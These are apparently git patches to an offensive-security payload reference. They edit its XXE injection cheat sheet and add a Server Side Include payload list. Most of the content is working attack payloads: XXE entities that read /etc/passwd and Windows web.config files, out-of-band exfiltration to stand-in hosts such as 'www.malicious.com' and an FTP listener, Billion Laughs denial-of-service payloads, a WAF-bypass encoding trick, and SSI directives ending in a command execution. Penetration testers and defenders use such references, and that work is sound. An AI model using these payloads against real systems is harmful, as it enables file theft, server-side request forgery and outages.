From 846706b87dac4cbd74990d802f103f8fbb1c47ab Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 18 Nov 2024 10:43:39 +0100
Subject: [PATCH 1/4] XXE on JSON Endpoints

---
 XXE Injection/README.md | 176 +++++++++++++++++++---------------------
 1 file changed, 84 insertions(+), 92 deletions(-)

diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index c0d3ffee5d..05908f471e 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -6,34 +6,36 @@
 ## Summary
 
 - [Tools](#tools)
-- [Detect the vulnerability](#detect-the-vulnerability)
-- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files)
+- [Detect The Vulnerability](#detect-the-vulnerability)
+- [Exploiting XXE to Retrieve Files](#exploiting-xxe-to-retrieve-files)
     - [Classic XXE](#classic-xxe)
-    - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded)
-    - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
-    - [XInclude attacks](#xinclude-attacks)
-- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)
-- [Exploiting XXE to perform a denial of service](#exploiting-xxe-to-perform-a-denial-of-service)
+    - [Classic XXE Base64 Encoded](#classic-xxe-base64-encoded)
+    - [PHP Wrapper Inside XXE](#php-wrapper-inside-xxe)
+    - [XInclude Attacks](#xinclude-attacks)
+- [Exploiting XXE to Perform SSRF Attacks](#exploiting-xxe-to-perform-SSRF-attacks)
+- [Exploiting XXE to Perform a Denial of Service](#exploiting-xxe-to-perform-a-denial-of-service)
     - [Billion Laugh Attack](#billion-laugh-attack)
-    - [YAML attack](#yaml-attack)
-    - [Parameters Laugh attack](#parameters-laugh-attack)
+    - [YAML Attack](#yaml-attack)
+    - [Parameters Laugh Attack](#parameters-laugh-attack)
 - [Exploiting Error Based XXE](#exploiting-error-based-xxe)
     - [Error Based - Using Local DTD File](#error-based---using-local-dtd-file)
     - [Error Based - Using Remote DTD](#error-based---using-remote-dtd)
-- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
+- [Exploiting Blind XXE to Exfiltrate Data Out Of Band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
     - [Blind XXE](#blind-xxe)
     - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
-    - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter)
+    - [XXE OOB with DTD and PHP Filter](#xxe-oob-with-dtd-and-php-filter)
     - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf)
+- [XXE with Local DTD](#xxe-with-local-dtd)
 - [WAF Bypasses](#waf-bypasses)
-   - [Bypass via character encoding](#bypass-via-character-encoding)
+   - [Bypass via Character Encoding](#bypass-via-character-encoding)
+   - [XXE on JSON Endpoints](#xxe-on-json-endpoints)
 - [XXE in Java](#xxe-in-java)
-- [XXE in exotic files](#xxe-in-exotic-files)
-    - [XXE inside SVG](#xxe-inside-svg)
-    - [XXE inside SOAP](#xxe-inside-soap)
-    - [XXE inside DOCX file](#xxe-inside-docx-file)
-    - [XXE inside XLSX file](#xxe-inside-xlsx-file)
-    - [XXE inside DTD file](#xxe-inside-dtd-file)
+- [XXE in Exotic Files](#xxe-in-exotic-files)
+    - [XXE Inside SVG](#xxe-inside-svg)
+    - [XXE Inside SOAP](#xxe-inside-soap)
+    - [XXE Inside DOCX file](#xxe-inside-docx-file)
+    - [XXE Inside XLSX file](#xxe-inside-xlsx-file)
+    - [XXE Inside DTD file](#xxe-inside-dtd-file)
 - [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
 - [Labs](#labs)
 - [References](#references)
@@ -41,58 +43,14 @@
 
 ## Tools
 
-- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads
-  ```ps1
-  sudo ./xxeftp -uno 443
-  ./xxeftp -w -wps 5555
-  ```
-- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/)
-  ```ps1
-  $ python3 230.py 2121
-  ```
-- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
-  ```ps1
-  # Enumerating /etc directory in HTTPS application:
-  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
-  # Enumerating /etc directory using gopher for OOB method:
-  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
-  # Second order exploitation:
-  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
-  # Bruteforcing files using HTTP out of band method and netdoc protocol:
-  ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
-  # Enumerating using direct exploitation:
-  ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
-  # Enumerating unfiltered ports:
-  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
-  # Stealing Windows hashes:
-  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
-  # Uploading files using Java jar:
-  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
-  # Executing system commands using PHP expect:
-  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
-  # Testing for XSLT injection:
-  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
-  # Log requests only:
-  ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
-  ```
-- [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)
-  ```ps1
-  ruby server.rb
-  ```
-- [docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc
-  ```ps1
-  ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx
-  ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place
-  ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place
-  ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx
-  ```
-- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities.
-  ```ps1
-  python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
-  ```
-
-
-## Detect the vulnerability
+- [staaldraad/xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads
+- [lc/230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/)
+- [enjoiz/XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
+- [BuffaloWill/oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)
+- [whitel1st/docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc
+
+
+## Detect The Vulnerability
 
 **Internal Entity**: If an entity is declared within a DTD it is called an internal entity.
 Syntax: `<!ENTITY entity_name "entity_value">`
@@ -113,7 +71,7 @@ Basic entity test, when the XML parser parses the external entities the result s
 
 It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
 
-## Exploiting XXE to retrieve files
+## Exploiting XXE to Retrieve Files
 
 ### Classic XXE
 
@@ -153,13 +111,13 @@ We try to display the content of the file `/etc/passwd`.
 <!ENTITY xxe PUBLIC "Any TEXT" "URL">
 ```
 
-### Classic XXE Base64 encoded
+### Classic XXE Base64 Encoded
 
 ```xml
 <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
 ```
 
-### PHP Wrapper inside XXE
+### PHP Wrapper Inside XXE
 
 ```xml
 <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
@@ -183,7 +141,7 @@ We try to display the content of the file `/etc/passwd`.
 <foo>&xxe;</foo>
 ```
 
-### XInclude attacks
+### XInclude Attacks
 
 When you can't modify the **DOCTYPE** element use the **XInclude** to target
 
@@ -194,7 +152,7 @@ When you can't modify the **DOCTYPE** element use the **XInclude** to target
 
 
 
-## Exploiting XXE to perform SSRF attacks
+## Exploiting XXE to Perform SSRF Attacks
 
 XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network.
 
@@ -208,7 +166,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
 ```
 
 
-## Exploiting XXE to perform a denial of service
+## Exploiting XXE to Perform a Denial of Service
 
 :warning: : These attacks might kill the service or the server, do not use them on the production.
 
@@ -225,7 +183,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
 <data>&a4;</data>
 ```
 
-### YAML attack
+### YAML Attack
 
 ```xml
 a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
@@ -239,7 +197,7 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
 i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
 ```
 
-### Parameters Laugh attack
+### Parameters Laugh Attack
 
 A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping.
 
@@ -334,7 +292,7 @@ Let's break down the payload:
 
 
 
-## Exploiting blind XXE to exfiltrate data out-of-band
+## Exploiting Blind XXE to Exfiltrate Data Out of Band
 
 Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
 
@@ -376,7 +334,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
 %all;
 ```
 
-### XXE OOB with DTD and PHP filter
+### XXE OOB with DTD and PHP Filter
 
 ```xml
 <?xml version="1.0" ?>
@@ -415,7 +373,7 @@ Send the XML file to the `deploy` folder.
 Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
 
 
-## XXE with local DTD
+## XXE with Local DTD
 
 In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:
 ```xml
@@ -451,26 +409,33 @@ Assuming payloads such as the previous return a verbose error. You can start poi
 ]>
 <root></root>
 ```
+
 ### Cisco WebEx
-```
+
+```xml
 <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
 <!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
 %local_dtd;
 ```
+
 ### Citrix XenMobile Server
-```
+
+```xml
 <!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
 <!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
 %local_dtd;
 ```
-[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
+
+* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs.
+
 
 
 ## WAF Bypasses
 
-### Bypass via character encoding
+### Bypass via Character Encoding
 
 XML parsers uses 4 methods to detect encoding:
+
 * HTTP Content Type: `Content-Type: text/xml; charset=utf-8`
 * Reading Byte Order Mark (BOM)
 * Reading first symbols of document 
@@ -491,6 +456,31 @@ XML parsers uses 4 methods to detect encoding:
 cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
 ```
 
+
+### XXE on JSON Endpoints
+
+In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**, 
+
+| Content Type       | Data                               |
+| ------------------ | ---------------------------------- |
+| `application/json` | `{"search":"name","value":"test"}` |
+| `application/xml`  | `<?xml version="1.0" encoding="UTF-8" ?><root><search>name</search><value>data</value></root>` |
+
+
+* XML documents must contain one root (`<root>`) element that is the parent of all other elements.
+* The data must be converted to XML too, otherwise the server will respond with an error. 
+
+```json
+{
+  "errors":{
+    "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."
+  }
+}
+```
+
+* [NetSPI/Content-Type Converter](https://github.com/NetSPI/Burp-Extensions/releases/tag/1.4)
+
+
 ## XXE in Java
 
 Insecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE:
@@ -512,9 +502,10 @@ Ref.
 - [Semgrep - XML Security in Java](https://semgrep.dev/blog/2022/xml-security-in-java)
 - [Semgrep - XML External entity prevention for Java](https://semgrep.dev/docs/cheat-sheets/java-xxe/)
 
-## XXE in exotic files
 
-### XXE inside SVG
+## XXE in Exotic Files
+
+### XXE Inside SVG
 
 ```xml
 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
@@ -565,7 +556,7 @@ _xxe.svg_
 <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://example.org:2121/%data;'>">
 ```
 
-### XXE inside SOAP
+### XXE Inside SOAP
 
 ```xml
 <soap:Body>
@@ -575,7 +566,7 @@ _xxe.svg_
 </soap:Body>
 ```
 
-### XXE inside DOCX file
+### XXE Inside DOCX file
 
 Format of an Open XML file (inject the payload in any .xml file):
 
@@ -600,11 +591,11 @@ JPG (experimental)
 GIF (experimental)
 ```
 
-### XXE inside XLSX file
+### XXE Inside XLSX file
 
 Structure of the XLSX:
 
-```
+```ps1
 $ 7z l xxe.xlsx
 [...]
    Date      Time    Attr         Size   Compressed  Name
@@ -667,7 +658,7 @@ Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/
 $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000
 ```
 
-### XXE inside DTD file
+### XXE Inside DTD file
 
 Most XXE payloads detailed above require control over both the DTD or `DOCTYPE` block as well as the `xml` file.
 In rare situations, you may only control the DTD file and won't be able to modify the `xml` file. For example, a MITM.
@@ -752,6 +743,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
 - [OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
 - [Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
 - [Pentest XXE - @phonexicum - March 9, 2020](https://phonexicum.github.io/infosec/xxe.html)
+- [Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/)
 - [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024](https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe)
 - [XML attacks - Mariusz Banach (@mgeeky) - December 21, 2017](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
 - [XML external entity (XXE) injection - PortSwigger - May 29, 2019](https://portswigger.net/web-security/xxe)

From 98cfc9ce8c06c9f48d7d91e8f17167c3b4bb5ff7 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 18 Nov 2024 12:41:35 +0100
Subject: [PATCH 2/4] XXE Error Based Local DTD

---
 XXE Injection/README.md | 181 ++++++++++++++--------------------------
 1 file changed, 61 insertions(+), 120 deletions(-)

diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 05908f471e..c2f6094f7f 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -19,24 +19,23 @@
     - [Parameters Laugh Attack](#parameters-laugh-attack)
 - [Exploiting Error Based XXE](#exploiting-error-based-xxe)
     - [Error Based - Using Local DTD File](#error-based---using-local-dtd-file)
+        - [Linux Local DTD](#linux-local-dtd)
+        - [Windows Local DTD](#windows-local-dtd)
     - [Error Based - Using Remote DTD](#error-based---using-remote-dtd)
 - [Exploiting Blind XXE to Exfiltrate Data Out Of Band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
     - [Blind XXE](#blind-xxe)
     - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
     - [XXE OOB with DTD and PHP Filter](#xxe-oob-with-dtd-and-php-filter)
     - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf)
-- [XXE with Local DTD](#xxe-with-local-dtd)
 - [WAF Bypasses](#waf-bypasses)
    - [Bypass via Character Encoding](#bypass-via-character-encoding)
    - [XXE on JSON Endpoints](#xxe-on-json-endpoints)
-- [XXE in Java](#xxe-in-java)
 - [XXE in Exotic Files](#xxe-in-exotic-files)
     - [XXE Inside SVG](#xxe-inside-svg)
     - [XXE Inside SOAP](#xxe-inside-soap)
     - [XXE Inside DOCX file](#xxe-inside-docx-file)
     - [XXE Inside XLSX file](#xxe-inside-xlsx-file)
     - [XXE Inside DTD file](#xxe-inside-dtd-file)
-- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
 - [Labs](#labs)
 - [References](#references)
 
@@ -217,7 +216,22 @@ A variant of the Billion Laughs attack, using delayed interpretation of paramete
 
 ### Error Based - Using Local DTD File
 
-Short list of dtd files already stored on Linux systems; list them with `locate .dtd`:
+If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename.
+
+```xml
+<!DOCTYPE root [
+    <!ENTITY % local_dtd SYSTEM "file:///abcxyz/">
+    %local_dtd;
+]>
+<root></root>
+```
+
+* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs.
+
+
+#### Linux Local DTD
+
+Short list of DTD files already stored on Linux systems; list them with `locate .dtd`:
 
 ```xml
 /usr/share/xml/fontconfig/fonts.dtd
@@ -245,6 +259,42 @@ The final payload becomes:
 <message>Text</message>
 ```
 
+#### Windows Local DTD
+
+Payloads from [infosec-au/xxe-windows.md](https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79).
+
+* Disclose local file
+
+  ```xml
+  <!DOCTYPE doc [
+      <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
+      <!ENTITY % SuperClass '>
+          <!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
+          <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://t/#&#x25;file;&#x27;>">
+          &#x25;eval;
+          &#x25;error;
+        <!ENTITY test "test"'
+      >
+      %local_dtd;
+    ]><xxx>anything</xxx>
+  ```
+
+* Disclose HTTP Response
+
+  ```xml
+  <!DOCTYPE doc [
+      <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
+      <!ENTITY % SuperClass '>
+          <!ENTITY &#x25; file SYSTEM "https://erp.company.com">
+          <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
+          &#x25;eval;
+          &#x25;error;
+        <!ENTITY test "test"'
+      >
+      %local_dtd;
+    ]><xxx>anything</xxx>
+  ```
+
 
 ### Error Based - Using Remote DTD
 
@@ -308,6 +358,12 @@ The easiest way to test for a blind XXE is to try to load a remote resource such
 <r></r>
 ```
 
+```xml
+<!DOCTYPE root [<!ENTITY test SYSTEM 'http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net'>]>
+<root>&test;</root>
+```
+
+
 Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
 
 ```xml
@@ -373,63 +429,6 @@ Send the XML file to the `deploy` folder.
 Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
 
 
-## XXE with Local DTD
-
-In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:
-```xml
-<!DOCTYPE root [<!ENTITY test SYSTEM 'http://h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net'>]>
-<root>&test;</root>
-```
-
-If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename.
-
-```xml
-<!DOCTYPE root [
-    <!ENTITY % local_dtd SYSTEM "file:///abcxyz/">
-
-    %local_dtd;
-]>
-<root></root>
-```
-
-Assuming payloads such as the previous return a verbose error. You can start pointing to local DTD. With an found DTD, you can submit payload such as the following payload. The content of the file will be place in the error message.
-
-```xml
-<!DOCTYPE root [
-    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
-
-    <!ENTITY % ISOamsa '
-        <!ENTITY &#x25; file SYSTEM "file:///REPLACE_WITH_FILENAME_TO_READ">
-        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
-        &#x25;eval;
-        &#x25;error;
-        '>
-
-    %local_dtd;
-]>
-<root></root>
-```
-
-### Cisco WebEx
-
-```xml
-<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
-<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
-%local_dtd;
-```
-
-### Citrix XenMobile Server
-
-```xml
-<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
-<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
-%local_dtd;
-```
-
-* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs.
-
-
-
 ## WAF Bypasses
 
 ### Bypass via Character Encoding
@@ -481,28 +480,6 @@ In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**,
 * [NetSPI/Content-Type Converter](https://github.com/NetSPI/Burp-Extensions/releases/tag/1.4)
 
 
-## XXE in Java
-
-Insecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE:
-
-![XXE Java security features overview infographics](https://semgrep.dev/docs/assets/images/cheat-sheets-xxe-java-infographics-1d1d5016802e3ab8f0886b62b8c81f21.png)
-
-- [DocumentBuilderFactory (javax.xml.parsers.DocumentBuilderFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3a-documentbuilderfactory)
-- [SAXBuilder (org.jdom2.input.SAXBuilder)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3b-saxbuilder)
-- [SAXParserFactory (javax.xml.parsers.SAXParserFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3c-saxparserfactory)
-- [SAXParser (javax.xml.parsers.SAXParser )](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3d-saxparser)
-- [SAXReader (org.dom4j.io.SAXReader)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3e-saxreader)
-- [TransformerFactory (javax.xml.transform.TransformerFactory) & SAXTransformerFactory (javax.xml.transform.sax.SAXTransformerFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3f-transformerfactory--saxtransformerfactory)
-- [SchemaFactory (javax.xml.validation.SchemaFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3g-schemafactory)
-- [Validator (javax.xml.validation.Validator)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3h-validator)
-- [XMLReader (org.xml.sax.XMLReader)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3i-xmlreader)
-
-Ref.
-
-- [Semgrep - XML Security in Java](https://semgrep.dev/blog/2022/xml-security-in-java)
-- [Semgrep - XML External entity prevention for Java](https://semgrep.dev/docs/cheat-sheets/java-xxe/)
-
-
 ## XXE in Exotic Files
 
 ### XXE Inside SVG
@@ -652,7 +629,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
 <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
 ```
 
-Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/xxeserv):
+Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv):
 
 ```
 $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000
@@ -674,42 +651,6 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
 ```
 
 
-## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents
-
-From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
-
-### Disclose local file
-
-```xml
-<!DOCTYPE doc [
-    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
-    <!ENTITY % SuperClass '>
-        <!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
-        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://t/#&#x25;file;&#x27;>">
-        &#x25;eval;
-        &#x25;error;
-      <!ENTITY test "test"'
-    >
-    %local_dtd;
-  ]><xxx>cacat</xxx>
-```
-
-### Disclose HTTP Response:
-
-```xml
-<!DOCTYPE doc [
-    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
-    <!ENTITY % SuperClass '>
-        <!ENTITY &#x25; file SYSTEM "https://erp.company.com">
-        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
-        &#x25;eval;
-        &#x25;error;
-      <!ENTITY test "test"'
-    >
-    %local_dtd;
-  ]><xxx>cacat</xxx>
-```
-
 ## Labs
 
 * [Root Me - XML External Entity](https://www.root-me.org/en/Challenges/Web-Server/XML-External-Entity)

From 0108d015716669f6727dd4ec5d628113a2892cd8 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 18 Nov 2024 16:51:28 +0100
Subject: [PATCH 3/4] Edge Side Inclusion

---
 .../Files/ssi_esi.txt                         | 92 +++++++++++++++++++
 Server Side Include Injection/README.md       | 55 +++++++++--
 2 files changed, 140 insertions(+), 7 deletions(-)
 create mode 100644 Server Side Include Injection/Files/ssi_esi.txt

diff --git a/Server Side Include Injection/Files/ssi_esi.txt b/Server Side Include Injection/Files/ssi_esi.txt
new file mode 100644
index 0000000000..bed4827e2e
--- /dev/null
+++ b/Server Side Include Injection/Files/ssi_esi.txt	
@@ -0,0 +1,92 @@
+<!--#config errmsg="File not found, informs users and password"-->
+<!--#config timefmt="A %B %d %Y %r"-->
+<!--#echo var="DATE_LOCAL" -->
+<!--#echo var="DOCUMENT_NAME" -->
+<!--#echo var="DOCUMENT_URI" -->
+<!--#echo var="auth_type" -->
+<!--#echo var="content_length" -->
+<!--#echo var="content_type" -->
+<!--#echo var="date_gmt" -->
+<!--#echo var="date_local" -->
+<!--#echo var="document_name" -->
+<!--#echo var="document_root" -->
+<!--#echo var="document_uri" -->
+<!--#echo var="forwarded" -->
+<!--#echo var="from" -->
+<!--#echo var="gateway_interface" -->
+<!--#echo var="http_accept" -->
+<!--#echo var="http_accept_charset" -->
+<!--#echo var="http_accept_encoding" -->
+<!--#echo var="http_accept_language" -->
+<!--#echo var="http_client_ip" -->
+<!--#echo var="http_connection" -->
+<!--#echo var="http_cookie" -->
+<!--#echo var="http_form" -->
+<!--#echo var="http_host" -->
+<!--#echo var="http_referer" -->
+<!--#echo var="http_ua_cpu" -->
+<!--#echo var="http_ua_os" -->
+<!--#echo var="http_user_agent" -->
+<!--#echo var="last_modified" -->
+<!--#echo var="netsite_root" -->
+<!--#echo var="page_count" -->
+<!--#echo var="path" -->
+<!--#echo var="path_info" -->
+<!--#echo var="path_info_translated" -->
+<!--#echo var="path_translated" -->
+<!--#echo var="query_string" -->
+<!--#echo var="query_string_unescaped" -->
+<!--#echo var="remote_addr" -->
+<!--#echo var="remote_host" -->
+<!--#echo var="remote_ident" -->
+<!--#echo var="remote_port" -->
+<!--#echo var="remote_user" -->
+<!--#echo var="request_method" -->
+<!--#echo var="request_uri" -->
+<!--#echo var="script_filename" -->
+<!--#echo var="script_name" -->
+<!--#echo var="script_uri" -->
+<!--#echo var="script_url" -->
+<!--#echo var="server_addr" -->
+<!--#echo var="server_admin" -->
+<!--#echo var="server_name -->
+<!--#echo var="server_port" -->
+<!--#echo var="server_protocol" -->
+<!--#echo var="server_software" -->
+<!--#echo var="site_htmlroot" -->
+<!--#echo var="total_hits" -->
+<!--#echo var="tz" -->
+<!--#echo var="unique_id" -->
+<!--#echo var="user_name" -->
+<!--#exec cmd="/bin/ls /" -->
